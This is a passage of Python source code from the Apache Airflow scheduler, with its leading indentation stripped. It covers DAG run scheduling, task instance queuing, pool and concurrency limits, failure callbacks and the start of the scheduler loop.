last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
period_end = None
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = min([t.end_date for t in dag.tasks if t.end_date], default=None)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session: Session = None
) -> List[TaskInstanceKey]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session: Session = None) -> List[TaskInstanceKey]:
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:rtype: list[TaskInstance]
:return: A list of generated TaskInstance objects
"""
check_slas: bool = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
use_job_schedule: bool = conf.getboolean('scheduler', 'USE_JOB_SCHEDULE')
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKey] = []
dag_ids: List[str] = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id: Dict[str, List[DagRun]] = {
k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)
}
for dag in dags:
dag_id: str = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag and use_job_schedule:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:return: DAGs to process
"""
if self.dag_ids:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids]
return dags
@provide_session
def execute_on_failure_callbacks(
self,
dagbag: DagBag,
failure_callback_requests: List[FailureCallbackRequest],
session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param failure_callback_requests: failure callbacks to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param session: DB session.
"""
for request in failure_callback_requests:
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
session.commit()
@provide_session
def process_file(
self,
file_path: str,
failure_callback_requests: List[FailureCallbackRequest],
pickle_dags: bool = False,
session: Session = None
) -> Tuple[List[dict], int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of serialized_dag dicts that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: a tuple with list of SimpleDags made from the Dags found in the file and
count of import errors.
:rtype: Tuple[List[dict], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
try:
self.execute_on_failure_callbacks(dagbag, failure_callback_requests)
except Exception: # pylint: disable=broad-except
self.log.exception("Error executing failure callback!")
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
serialized_dags = self._prepare_serialized_dags(unpaused_dags, pickle_dags, session)
dags = self._find_dags_to_process(unpaused_dags)
ti_keys_to_schedule = self._process_dags(dags, session)
self._schedule_task_instances(dagbag, ti_keys_to_schedule, session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return serialized_dags, len(dagbag.import_errors)
@provide_session
def _schedule_task_instances(
self,
dagbag: DagBag,
ti_keys_to_schedule: List[TaskInstanceKey],
session: Session = None
) -> None:
"""
Checks whether the tasks specified by `ti_keys_to_schedule` parameter can be scheduled and
updates the information in the database,
:param dagbag: DagBag
:type dagbag: DagBag
:param ti_keys_to_schedule: List of task instnace keys which can be scheduled.
:type ti_keys_to_schedule: list
"""
# Refresh all task instances that will be scheduled
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis: List[TI] = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag: DAG = dagbag.dags[ti.dag_id]
ti.task = dag.get_task(ti.task_id)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_execute_callback \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
@provide_session
def _prepare_serialized_dags(
self, dags: List[DAG], pickle_dags: bool, session: Session = None
) -> List[dict]:
"""
Convert DAGS to SimpleDags. If necessary, it also Pickle the DAGs
:param dags: List of DAGs
:return: List of SimpleDag
:rtype: List[dict]
"""
serialized_dags: List[dict] = []
# Pickle the DAGs (if necessary) and put them into a SimpleDagBag
for dag in dags:
if pickle_dags:
dag.pickle(session)
serialized_dags.append(SerializedDAG.to_dict(dag))
return serialized_dags
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id: Optional[str] = None,
dag_ids: Optional[List[str]] = None,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
def register_exit_signals(self) -> None:
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self,
simple_dag_bag: SimpleDagBag,
old_states: List[str],
new_state: str,
session: Session = None
) -> None:
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = query.with_for_update().all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _find_executable_task_instances(
self,
simple_dag_bag: SimpleDagBag,
session: Session = None
) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
task_instances_to_examine: List[TI] = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB.value))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
.filter(TI.state == State.SCHEDULED)
.all()
)
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools: Dict[str, models.Pool] = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
serialized_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit: Optional[int] = None
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(
self, task_instances: List[TI], session: Session = None
) -> List[SimpleTaskInstance]:
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
tis_to_set_to_queued: List[TI] = (
session
.query(TI)
.filter(TI.filter_for_tis(task_instances))
.filter(TI.state == State.SCHEDULED)
.with_for_update()
.all()
)
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(
self,
simple_dag_bag: SimpleDagBag,
simple_task_instances: List[SimpleTaskInstance]
) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
# actually enqueue them
for simple_task_instance in simple_task_instances:
serialized_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=serialized_dag.full_filepath,
pickle_id=serialized_dag.pickle_id,
)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue,
)
@provide_session
def _execute_task_instances(
self,
simple_dag_bag: SimpleDagBag,
session: Session = None
) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, session=session)
def query(result: int, items: List[TI]) -> int:
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items, session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = ti_query.with_for_update().all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag: SimpleDagBag, session: Session = None) -> None:
"""
Respond to executor events.
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer(simple_dag_bag.dag_ids)
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id, ti_key.task_id, ti_key.execution_date, state, ti_key.try_number
)
if state in (State.FAILED, State.SUCCESS):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = "Executor reports task instance %s finished (%s) although the " \
"task says its %s. (Info: %s) Was the task killed externally?"
self.log.error(msg, ti, state, ti.state, info)
serialized_dag = simple_dag_bag.get_dag(ti.dag_id)
self.processor_agent.send_callback_to_execute(
full_filepath=serialized_dag.full_filepath,
task_instance=ti,
msg=msg % (ti, state, ti.state, info),
)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_runs)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_runs,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=self.dag_ids,
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
failure_callback_requests: List[FailureCallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool
) -> DagFileProcessorProcess:
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_ids=dag_ids,
failure_callback_requests=failure_callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
